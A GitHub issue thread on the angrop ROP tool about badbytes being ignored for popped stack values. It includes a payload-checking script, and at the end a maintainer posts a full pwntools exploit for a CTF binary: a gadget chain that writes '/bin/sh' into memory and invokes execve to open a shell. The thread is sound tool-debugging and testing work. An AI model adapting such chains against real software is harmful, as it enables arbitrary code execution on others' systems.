angr / angrop

BSD 2-Clause "Simplified" License

Values passed on stack ignoring badbytes #29

Closed redfast00 closed 2 years ago

redfast00 commented 5 years ago

import angr, angrop
p = angr.Project("bronze_ropchain")
rop = p.analyses.ROP()
rop.set_badbytes([0x0, 0x0a])
rop.find_gadgets()
rop.execve().payload_str()
> b'\xb4d\x05\x08\xc9bin\xbc\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08\xb4d\x05\x08\xc9sh\x00\xc0\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08\x9c\x89\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xcf\r\x08\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00`\xf8\x06\x08'

redfast00 commented 5 years ago

rop.set_regs(eax=0).payload_str() also includes the bad bytes. Maybe there is no constraint added for the values on the stack that will be popped?
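A quick way to confirm what the report describes is to scan the emitted chain yourself and see which 4-byte stack slots carry a bad byte: the gadget addresses are clean, and the offenders are the values that get popped (the zeroed words and the `sh\0` string). The check below is an added example, not code from angrop or from anyone in this thread; the function names (`find_badbytes`, `bad_slots`, `value_is_clean`, `report`) are my own, and the payload constant is the one quoted in the first comment with badbytes `0x00` and `0x0a`.

```python
# Added example, not code from angrop or from the thread participants.
# Validates a ROP payload against a badbyte set and reports the offending
# word-aligned stack slots, so a chain that carries a bad byte in a popped
# value (rather than in a gadget address) is caught before it is used.

# Payload quoted in the issue above, generated with badbytes 0x00 and 0x0a.
PAYLOAD = (
    b'\xb4d\x05\x08\xc9bin\xbc\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08'
    b'\xb4d\x05\x08\xc9sh\x00\xc0\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08'
    b'\x9c\x89\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    b'\x00\x00\x00\x00\xc0\xcf\r\x08\x00\x00\x00\x00\x00\x00\x00\x00'
    b'\x0b\x00\x00\x00`\xf8\x06\x08'
)
BADBYTES = frozenset({0x00, 0x0a})  # same set as rop.set_badbytes([0x0, 0x0a])
WORD = 4                            # 32-bit target, one stack slot per word


def find_badbytes(payload, badbytes=BADBYTES, word_size=WORD):
    """Return (offset, byte, slot_index, slot_value) for every bad byte.

    slot_index is the word-aligned position in the chain; slot_value is the
    little-endian integer that slot holds, i.e. what gets popped or returned into.
    """
    hits = []
    for off, b in enumerate(payload):
        if b in badbytes:
            slot = off // word_size
            chunk = payload[slot * word_size:(slot + 1) * word_size]
            hits.append((off, b, slot, int.from_bytes(chunk, "little")))
    return hits


def bad_slots(payload, badbytes=BADBYTES, word_size=WORD):
    """Sorted list of distinct slot indices that contain at least one bad byte."""
    return sorted({slot for _, _, slot, _ in find_badbytes(payload, badbytes, word_size)})


def value_is_clean(value, badbytes=BADBYTES, word_size=WORD):
    """True if a word can sit on the stack without any bad byte in its encoding.

    This is the per-slot constraint the report says is missing for popped values.
    """
    return not any(b in badbytes for b in value.to_bytes(word_size, "little"))


def report(payload, badbytes=BADBYTES, word_size=WORD):
    """One human-readable line per bad slot: index, byte offset, raw bytes, value."""
    lines = []
    for slot in bad_slots(payload, badbytes, word_size):
        chunk = payload[slot * word_size:(slot + 1) * word_size]
        value = int.from_bytes(chunk, "little")
        lines.append(f"slot {slot:2d} @ +{slot * word_size:3d}: {chunk.hex()}  (0x{value:08x})")
    return lines


if __name__ == "__main__":
    for line in report(PAYLOAD):
        print(line)
```

Running it on the quoted payload shows the first bad byte at offset 12 (the all-zero word popped right after the gadget at `0x080dcfbc`) and the `sh\0` word in slot 6, while every slot that holds a gadget address passes `value_is_clean`. The same scan is a cheap regression check to run on any chain angrop emits with badbytes configured.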

github-actions[bot] commented 2 years ago

This issue has been marked as stale because it has no recent activity. Please comment or add the pinned tag to prevent this issue from being closed.

redfast00 commented 2 years ago

is this issue fixed?

github-actions[bot] commented 2 years ago

This issue has been marked as stale because it has no recent activity. Please comment or add the pinned tag to prevent this issue from being closed.

redfast00 commented 2 years ago

is this issue fixed?

Kyle-Kyle commented 2 years ago

I think I refactored angrop's badbyte handling mechanism once and it should be fixed. Do you think you can still find the binary and share it here so that we can make sure it is actually fixed? @redfast00

Kyle-Kyle commented 2 years ago

^ that happened in early 2021 iirc

redfast00 commented 2 years ago

I think it's https://github.com/JustBeYou/ctfs/blob/master/redpwn/bronze_ropchain

Kyle-Kyle commented 2 years ago

I have used angrop to generate a working ropchain using your script. The exploitation script is this:

from pwn import *

chain = b""
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0x6e69622f)
chain += p32(0x80d9f51)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0xff68732f)
chain += p32(0x80d9f55)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806274c) # lea esi, [esi]; xor eax, eax; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x80da008)
chain += p32(0x8066d62) # mov byte ptr [edx], al; mov eax, edx; ret
chain += p32(0x8092016) # mov eax, 8; pop edi; ret
chain += p32(0xf5f5f5f5)
chain += p32(0x8092d7b) # mov edi, 0; add eax, 3; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x8048008)
chain += p32(0x806ef52) # pop ecx; pop ebx; ret
chain += p32(0x8048008)
chain += p32(0x80da001)
chain += p32(0x806f860) # int 0x80

#r = gdb.debug("./bronze_ropchain")
r = process("./bronze_ropchain")
r.sendlineafter(b"name?", b'A'*28+chain)  # 28 bytes of padding up to the saved return address
r.interactive()

the patch is pending.